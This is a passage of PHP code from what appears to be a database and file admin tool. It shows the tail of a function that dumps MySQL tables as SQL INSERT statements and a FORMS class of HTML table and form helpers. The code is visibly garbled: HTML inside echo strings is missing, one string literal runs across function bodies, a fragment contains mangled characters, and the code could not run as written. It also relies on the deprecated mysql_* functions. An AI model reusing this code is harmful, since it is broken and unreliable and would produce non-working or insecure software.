($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } mysql_free_result($rows); } class FORMS { function tableheader() { echo "\n"; } function headerform($arg=array()) { global $dir; if ($arg[enctype]){ $enctype="enctype=\"$arg[enctype]\""; } else { $enctype=""; } if (!isset($arg[method])) { $arg[method] = "POST"; } if (!isset($arg[action])) { $arg[action] = ''; } echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; } function tdheader($title) { global $dir; echo " \n"; echo " \n"; echo " \n"; } function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { if ($bgcolor=='2') { $css="secondalt"; } elseif ($bgcolor=='1') { $css="firstalt"; } else { $css=$bgcolor; } $height = empty($height) ? "" : " height=".$height; $colspan = empty($colspan) ? "" : " colspan=".$colspan; echo " \n"; echo " \n"; echo " \n"; } function tablefooter() { echo "

".$arg[content]."

".$title." [��]

".$content."

\n"; } function formheader($action='',$title,$target='') { global $dir; $target = empty($target) ? "" : " target=\"".$target."\""; echo " \n"; echo $end = empty($over) ? "" : "\n"; } function makeselect($arg = array()){ if ($arg[multiple]==1) { $multiple = " multiple"; if ($arg[size]>0) { $size = "size=$arg[size]"; } } if ($arg[css]==0) { $css = "class=\"input\""; } $select = "\n"; return $select; } } ?>